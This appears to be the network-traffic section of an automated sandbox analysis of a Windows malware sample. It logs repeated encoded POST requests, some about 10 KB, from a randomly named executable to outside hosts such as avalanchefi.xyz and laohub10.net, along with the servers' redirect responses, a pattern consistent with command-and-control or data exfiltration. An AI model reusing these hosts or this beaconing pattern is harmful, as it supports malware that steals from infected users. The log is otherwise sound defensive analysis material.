                                                Host: www.jalan2.online
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                Nov 20, 2024 07:16:33.637625933 CET1236INHTTP/1.1 404 Not Found
                                                content-type: text/html
                                                cache-control: private, no-cache, max-age=0
                                                pragma: no-cache
                                                content-length: 1249
                                                date: Wed, 20 Nov 2024 06:16:33 GMT
                                                server: LiteSpeed
                                                connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, [TRUNCATED]
                                                Nov 20, 2024 07:16:33.637675047 CET224INData Raw: 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c
                                                Data Ascii: 3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.44999913.248.169.48801068C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 07:16:38.916897058 CET807OUTPOST /ctta/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.avalanchefi.xyz
                                                Origin: http://www.avalanchefi.xyz
                                                Referer: http://www.avalanchefi.xyz/ctta/
                                                Content-Type: application/x-www-form-urlencoded
                                                Connection: close
                                                Content-Length: 203
                                                Cache-Control: max-age=0
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                Data Raw: 56 62 6c 64 64 6c 3d 32 31 4a 4e 4c 4c 52 36 6e 57 4c 77 78 77 6f 46 73 7a 6c 46 6f 47 6d 43 66 4a 35 68 31 73 50 56 34 52 30 70 58 49 61 6b 31 64 4d 34 55 77 63 6f 48 6b 6c 62 76 30 6a 73 46 7a 32 39 70 33 52 73 72 6e 5a 6e 61 41 59 62 4e 36 72 74 31 74 67 36 42 79 65 57 46 48 36 53 70 31 64 55 6a 72 79 5a 32 6a 6b 41 75 56 75 50 69 78 68 6c 64 6a 6a 36 36 42 38 33 5a 6a 35 38 72 6c 6d 36 56 43 37 44 68 45 73 49 47 64 36 48 6d 41 51 38 35 7a 6c 76 75 61 4c 67 36 4f 52 56 42 4f 76 48 49 74 58 63 76 4e 56 62 53 42 70 37 4f 34 65 5a 4c 66 4a 42 77 36 7a 74 77 57 56 78 41 49 6a 64 55 78 7a 47 6c 67 3d 3d
                                                Data Ascii: Vblddl=21JNLLR6nWLwxwoFszlFoGmCfJ5h1sPV4R0pXIak1dM4UwcoHklbv0jsFz29p3RsrnZnaAYbN6rt1tg6ByeWFH6Sp1dUjryZ2jkAuVuPixhldjj66B83Zj58rlm6VC7DhEsIGd6HmAQ85zlvuaLg6ORVBOvHItXcvNVbSBp7O4eZLfJBw6ztwWVxAIjdUxzGlg==


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.45000813.248.169.48801068C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 07:16:41.470963955 CET827OUTPOST /ctta/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.avalanchefi.xyz
                                                Origin: http://www.avalanchefi.xyz
                                                Referer: http://www.avalanchefi.xyz/ctta/
                                                Content-Type: application/x-www-form-urlencoded
                                                Connection: close
                                                Content-Length: 223
                                                Cache-Control: max-age=0
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                Data Raw: 56 62 6c 64 64 6c 3d 32 31 4a 4e 4c 4c 52 36 6e 57 4c 77 2b 7a 67 46 72 51 4e 46 6a 47 6d 42 51 70 35 68 76 63 50 52 34 52 49 70 58 4a 50 76 30 76 59 34 56 52 73 6f 41 68 52 62 73 30 6a 73 4f 54 33 33 32 6e 52 72 72 6e 56 56 61 42 6b 62 4e 36 76 74 31 75 30 36 41 46 43 58 48 58 36 51 79 6c 64 61 74 4c 79 5a 32 6a 6b 41 75 56 72 48 69 78 35 6c 42 44 54 36 37 67 38 30 48 7a 35 2f 6f 6c 6d 36 52 43 37 48 68 45 73 2b 47 59 69 70 6d 46 4d 38 35 33 70 76 75 4c 4c 76 77 4f 52 66 50 75 75 57 50 49 76 58 70 63 6b 4e 4b 6e 6c 38 4b 5a 43 41 4b 5a 45 62 68 4c 53 36 69 57 78 43 64 50 71 70 5a 79 4f 50 2b 71 4c 56 46 38 4c 6c 61 31 4c 63 6f 53 57 42 69 73 37 36 32 67 77 3d
                                                Data Ascii: Vblddl=21JNLLR6nWLw+zgFrQNFjGmBQp5hvcPR4RIpXJPv0vY4VRsoAhRbs0jsOT332nRrrnVVaBkbN6vt1u06AFCXHX6QyldatLyZ2jkAuVrHix5lBDT67g80Hz5/olm6RC7HhEs+GYipmFM853pvuLLvwORfPuuWPIvXpckNKnl8KZCAKZEbhLS6iWxCdPqpZyOP+qLVF8Lla1LcoSWBis762gw=


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.45000913.248.169.48801068C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 07:16:44.018099070 CET10909OUTPOST /ctta/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.avalanchefi.xyz
                                                Origin: http://www.avalanchefi.xyz
                                                Referer: http://www.avalanchefi.xyz/ctta/
                                                Content-Type: application/x-www-form-urlencoded
                                                Connection: close
                                                Content-Length: 10303
                                                Cache-Control: max-age=0
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                Data Raw: 56 62 6c 64 64 6c 3d 32 31 4a 4e 4c 4c 52 36 6e 57 4c 77 2b 7a 67 46 72 51 4e 46 6a 47 6d 42 51 70 35 68 76 63 50 52 34 52 49 70 58 4a 50 76 30 76 41 34 55 6a 6b 6f 47 47 4e 62 74 30 6a 73 53 44 33 36 32 6e 51 75 72 6e 4d 63 61 42 6f 68 4e 34 6e 74 30 4d 73 36 49 55 43 58 4e 58 36 51 74 31 64 58 6a 72 79 32 32 6e 49 4d 75 56 37 48 69 78 35 6c 42 41 4c 36 79 52 38 30 46 7a 35 38 72 6c 6d 6d 56 43 36 53 68 45 30 41 47 5a 57 58 6d 78 41 38 35 58 35 76 39 74 66 76 7a 75 52 5a 43 4f 75 4f 50 49 71 50 70 59 38 33 4b 6e 35 61 4b 5a 6d 41 4c 74 35 59 32 34 43 47 2b 47 31 64 45 76 62 4d 64 67 33 50 77 4b 50 2f 4a 4a 71 6c 42 58 6a 30 6f 77 50 79 39 4f 58 41 76 6d 4d 63 65 6d 54 37 63 4d 6c 31 61 35 77 46 48 64 33 38 72 70 6a 62 67 66 42 2f 31 7a 6a 53 56 4e 74 2b 4d 68 6f 75 34 2f 58 57 62 4c 70 44 4a 5a 62 51 67 76 74 39 33 70 6f 49 31 30 4e 7a 31 30 4a 41 37 66 72 31 38 33 37 35 70 49 35 52 69 33 33 78 51 46 4f 46 46 39 77 78 37 57 59 75 55 37 51 4f 72 4b 55 76 47 72 6d 46 4e 79 2b 36 54 68 76 54 69 64 37 [TRUNCATED]
                                                Data Ascii: Vblddl=21JNLLR6nWLw+zgFrQNFjGmBQp5hvcPR4RIpXJPv0vA4UjkoGGNbt0jsSD362nQurnMcaBohN4nt0Ms6IUCXNX6Qt1dXjry22nIMuV7Hix5lBAL6yR80Fz58rlmmVC6ShE0AGZWXmxA85X5v9tfvzuRZCOuOPIqPpY83Kn5aKZmALt5Y24CG+G1dEvbMdg3PwKP/JJqlBXj0owPy9OXAvmMcemT7cMl1a5wFHd38rpjbgfB/1zjSVNt+Mhou4/XWbLpDJZbQgvt93poI10Nz10JA7fr18375pI5Ri33xQFOFF9wx7WYuU7QOrKUvGrmFNy+6ThvTid7sdjzbP5VX6e8DBh6PKaPJVSJPYu8/hfIk4TCHdhy7U2mqQ7W3jtL2N2HOhtAbg0feCnOo5Wb6IQvmMn6ts3jsOWBm5X+Tvg0yJnU+BB1X+NxB7MJWdfjLyuEB5u1WC2Iezle+a10gj+mD2zO0AUP0s+F10tE9TnfMlRKZ6e/PBH9BQePfAVf+fcALqh10ot87eUv2D+UW1NYGkiwMb+h6ROSv/YsgVZ6pz82TeTsPB0dzIlnkYNqAxNb3agTibzJP+1CV/3NpRM5e4rhzTG6K3slcAG10HMQwQ87zsMxPNUVxyi+d0XFY1qCYeEo4n88tZHqEWSMKk1q4/2UrfmwWkWPvxFyteE9BIfTniOPGTGjzKvpEDpo76fJBN5Exy9mfUK3V9uPw3Tn/80LdGYAm+Fd5UtP+zU0SWZiw9r/B4FZcqNgygpzVR8PXXWQ/VIWnnjicSRQ4dD3w++OIOcZS9rViUf1vET8Mcabw76RvyaEXWh9XCPFwHE8wdlMDxT5NbgqA84sPY+EKdumxc39qCoum3MvaLfW69+qNflaN0zardCB6VqNoGI30H0a84KoapSKQLZzX2YKKw9diBsL9s4bpsayeu7UdK1NhQVRm9UUTBCrDva74FODqjDJJkihYOgJKwc0kxpLn7sgK8jT0dVInq5+7REf35 [TRUNCATED]


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.45001013.248.169.48801068C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 07:16:46.553575993 CET528OUTGET /ctta/?At=4ZW0&Vblddl=73htI/07lnbi6jhjvkNHrlWSa6BSjsKivRRSV4arkt57XDlKC2xJvna+Jje1nWd5k0Z3PS0VVZTw4ek7NFPoag2/xWEWhdCP8yoM02bo7Rk5ZALP8w8OFi4= HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.avalanchefi.xyz
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                Nov 20, 2024 07:16:47.040091991 CET390INHTTP/1.1 200 OK
                                                Server: openresty
                                                Date: Wed, 20 Nov 2024 06:16:46 GMT
                                                Content-Type: text/html
                                                Content-Length: 250
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 74 3d 34 5a 57 30 26 56 62 6c 64 64 6c 3d 37 33 68 74 49 2f 30 37 6c 6e 62 69 36 6a 68 6a 76 6b 4e 48 72 6c 57 53 61 36 42 53 6a 73 4b 69 76 52 52 53 56 34 61 72 6b 74 35 37 58 44 6c 4b 43 32 78 4a 76 6e 61 2b 4a 6a 65 31 6e 57 64 35 6b 30 5a 33 50 53 30 56 56 5a 54 77 34 65 6b 37 4e 46 50 6f 61 67 32 2f 78 57 45 57 68 64 43 50 38 79 6f 4d 30 32 62 6f 37 52 6b 35 5a 41 4c 50 38 77 38 4f 46 69 34 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?At=4ZW0&Vblddl=73htI/07lnbi6jhjvkNHrlWSa6BSjsKivRRSV4arkt57XDlKC2xJvna+Jje1nWd5k0Z3PS0VVZTw4ek7NFPoag2/xWEWhdCP8yoM02bo7Rk5ZALP8w8OFi4="}</script></head></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.45001123.225.159.42801068C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 07:17:01.733335018 CET798OUTPOST /dfeq/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.laohub10.net
                                                Origin: http://www.laohub10.net
                                                Referer: http://www.laohub10.net/dfeq/
                                                Content-Type: application/x-www-form-urlencoded
                                                Connection: close
                                                Content-Length: 203
                                                Cache-Control: max-age=0
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                Data Raw: 56 62 6c 64 64 6c 3d 74 43 2f 30 49 71 66 59 67 33 52 51 70 64 44 30 45 79 72 37 56 43 74 66 4f 5a 39 57 50 61 67 59 4f 43 5a 45 6a 6a 76 62 77 72 35 38 35 63 2f 6d 69 6a 73 5a 76 68 44 41 46 52 4f 61 35 64 42 41 4c 4f 46 6d 5a 45 2f 74 7a 6c 45 52 4c 59 38 54 71 52 68 77 70 43 4d 32 5a 6f 66 50 44 79 31 42 4e 55 57 78 71 78 79 37 32 56 6f 36 59 53 35 47 5a 67 4e 4a 48 2b 43 55 78 2b 34 32 44 4b 4f 75 37 46 37 70 77 6e 4f 36 54 68 6f 43 66 34 33 7a 39 6f 6b 53 48 77 42 59 79 35 63 6e 46 71 42 4b 62 57 79 63 33 6f 4f 2f 4a 42 4c 56 33 4e 44 46 74 30 38 63 67 61 6f 6b 6a 71 6f 68 37 65 4b 63 2f 67 3d 3d
                                                Data Ascii: Vblddl=tC/0IqfYg3RQpdD0Eyr7VCtfOZ9WPagYOCZEjjvbwr585c/mijsZvhDAFROa5dBALOFmZE/tzlERLY8TqRhwpCM2ZofPDy1BNUWxqxy72Vo6YS5GZgNJH+CUx+42DKOu7F7pwnO6ThoCf43z9okSHwBYy5cnFqBKbWyc3oO/JBLV3NDFt08cgaokjqoh7eKc/g==
                                                Nov 20, 2024 07:17:02.265736103 CET525INHTTP/1.1 200 OK
                                                Server: Apache
                                                Content-Type: text/html; charset=utf-8
                                                Accept-Ranges: bytes
                                                Cache-Control: max-age=86400
                                                Age: 1
                                                Connection: Close
                                                Content-Length: 350
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                10192.168.2.45001223.225.159.42801068C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 07:17:04.285145044 CET818OUTPOST /dfeq/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.laohub10.net
                                                Origin: http://www.laohub10.net
                                                Referer: http://www.laohub10.net/dfeq/
                                                Content-Type: application/x-www-form-urlencoded
                                                Connection: close
                                                Content-Length: 223
                                                Cache-Control: max-age=0
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                Data Raw: 56 62 6c 64 64 6c 3d 74 43 2f 30 49 71 66 59 67 33 52 51 71 2b 62 30 47 52 54 37 55 69 74 63 4c 5a 39 57 56 71 67 63 4f 43 46 45 6a 68 44 78 78 5a 4e 38 34 38 50 6d 6a 6d 59 5a 6f 68 44 41 52 68 50 65 6b 74 42 50 4c 4f 5a 45 5a 45 7a 74 7a 6d 34 52 4c 64 51 54 72 69 4a 2f 70 53 4d 6f 4e 59 66 4a 63 43 31 42 4e 55 57 78 71 31 53 56 32 56 77 36 59 68 68 47 5a 42 4e 4b 59 4f 43 54 32 2b 34 32 49 71 4f 69 37 46 37 48 77 6d 53 63 54 6a 67 43 66 36 2f 7a 6b 5a 6b 52 4d 77 41 52 2f 5a 64 62 43 4c 6f 51 61 46 6a 48 7a 72 61 67 4a 77 72 52 79 4c 4f 66 38 46 64 4c 79 61 4d 58 2b 74 68 56 32 64 33 56 6b 69 45 6e 63 74 47 34 78 32 37 54 39 75 44 51 7a 31 2b 30 71 4d 6f 3d
                                                Data Ascii: Vblddl=tC/0IqfYg3RQq+b0GRT7UitcLZ9WVqgcOCFEjhDxxZN848PmjmYZohDARhPektBPLOZEZEztzm4RLdQTriJ/pSMoNYfJcC1BNUWxq1SV2Vw6YhhGZBNKYOCT2+42IqOi7F7HwmScTjgCf6/zkZkRMwAR/ZdbCLoQaFjHzragJwrRyLOf8FdLyaMX+thV2d3VkiEnctG4x27T9uDQz1+0qMo=
                                                Nov 20, 2024 07:17:04.785247087 CET525INHTTP/1.1 200 OK
                                                Server: Apache
                                                Content-Type: text/html; charset=utf-8
                                                Accept-Ranges: bytes
                                                Cache-Control: max-age=86400
                                                Age: 1
                                                Connection: Close
                                                Content-Length: 350
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                11192.168.2.45001323.225.159.42801068C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 07:17:06.847160101 CET10900OUTPOST /dfeq/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.laohub10.net
                                                Origin: http://www.laohub10.net
                                                Referer: http://www.laohub10.net/dfeq/
                                                Content-Type: application/x-www-form-urlencoded
                                                Connection: close
                                                Content-Length: 10303
                                                Cache-Control: max-age=0
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                Data Raw: 56 62 6c 64 64 6c 3d 74 43 2f 30 49 71 66 59 67 33 52 51 71 2b 62 30 47 52 54 37 55 69 74 63 4c 5a 39 57 56 71 67 63 4f 43 46 45 6a 68 44 78 78 5a 56 38 34 50 48 6d 68 46 41 5a 70 68 44 41 53 68 50 54 6b 74 42 53 4c 4f 42 41 5a 45 50 62 7a 67 30 52 5a 4c 45 54 73 54 4a 2f 69 53 4d 6f 53 49 66 49 44 79 31 51 4e 55 47 31 71 78 32 56 32 56 77 36 59 6e 4e 47 4f 41 4e 4b 4c 65 43 55 78 2b 34 36 44 4b 4f 4f 37 46 69 36 77 6d 57 71 55 53 41 43 66 61 50 7a 2f 4c 4d 52 51 67 41 66 73 70 64 44 43 4c 31 4f 61 44 48 4c 7a 71 65 47 4a 77 66 52 2f 66 50 37 76 32 4d 49 71 35 67 39 39 4e 6c 4a 76 74 72 37 68 56 30 44 66 70 32 61 75 48 44 74 6e 5a 79 43 6e 41 58 2b 6f 61 72 68 2f 2f 32 48 6e 35 6b 58 6f 59 68 5a 39 74 6b 79 79 79 64 77 2b 48 79 51 66 5a 41 50 4f 68 47 6b 78 72 64 52 59 76 62 49 37 6d 46 6a 6f 41 4e 78 43 44 79 76 75 48 43 6c 4d 76 49 65 43 7a 43 45 4b 2f 49 47 53 2b 37 46 70 4e 67 4b 53 76 46 68 32 63 4e 69 57 56 78 7a 7a 37 75 48 56 77 5a 76 75 41 41 79 30 69 57 43 6d 6a 2b 73 32 68 43 45 52 33 53 [TRUNCATED]
                                                Data Ascii: Vblddl=tC/0IqfYg3RQq+b0GRT7UitcLZ9WVqgcOCFEjhDxxZV84PHmhFAZphDAShPTktBSLOBAZEPbzg0RZLETsTJ/iSMoSIfIDy1QNUG1qx2V2Vw6YnNGOANKLeCUx+46DKOO7Fi6wmWqUSACfaPz/LMRQgAfspdDCL1OaDHLzqeGJwfR/fP7v2MIq5g99NlJvtr7hV0Dfp2auHDtnZyCnAX+oarh//2Hn5kXoYhZ9tkyyydw+HyQfZAPOhGkxrdRYvbI7mFjoANxCDyvuHClMvIeCzCEK/IGS+7FpNgKSvFh2cNiWVxzz7uHVwZvuAAy0iWCmj+s2hCER3ShQa2widYKlVK65zNKEDuddKcBCkWvxVt4ME6/mssejkrl6ccrelbQzmmbVxzGtfrwBx7H49larTI19gJq0NsFVVS9jVSkazu8QhzW5lcmNHtpvfsysvF3bJUeBF9i606gHFWmF2vEZHFCWV7by4GsAtXtY5egt5moUnjRb5Amcif2/bsrYa8/E9RwvuTvERVKJRO627Gw9ulkh8BA4cFG8Gf+edeVVZLtBr7h1Trz4Buodg5UwWIjtD5QpjD3cMQHQJRKk4dLLanAjKGiEvAu+6Eh6ZRrHZi5SMcOQ1uAzcCyyJecpYKoGQpy7kBEkXiOAA4zOgz63djZuAayLxSE4J+hcUeBDQ8aPEOBIUbu4m3Tu6u0rIjpBkeG7wteU8BPdSGJAuqgRNkCBo0U1cUERyzpt1uiw9R7WspV4mEVKbUxyjvpiySSEO/uL2ax/06Wh4sLzNpu6hVM6cqN6KamKdPeSCtYvgoVraGADCNAAmJ+d50MeYulhmogR6Ea9668BkrYc17YOhC4LJPHoFt2KtkAJamANIi87Q6TrpuxsZDhZ2tBXqafu5uoprbZi5xSX+TpqQvvtGeuPYtb6ibcMNjKqOeYx8lE349cPW0If4JirBH6eI44XE8RzCzBMnz9UBtU6W8HuHdbB4AL9rWqFFLwuDAySR3/8 [TRUNCATED]
                                                Nov 20, 2024 07:17:07.349201918 CET525INHTTP/1.1 200 OK
                                                Server: Apache
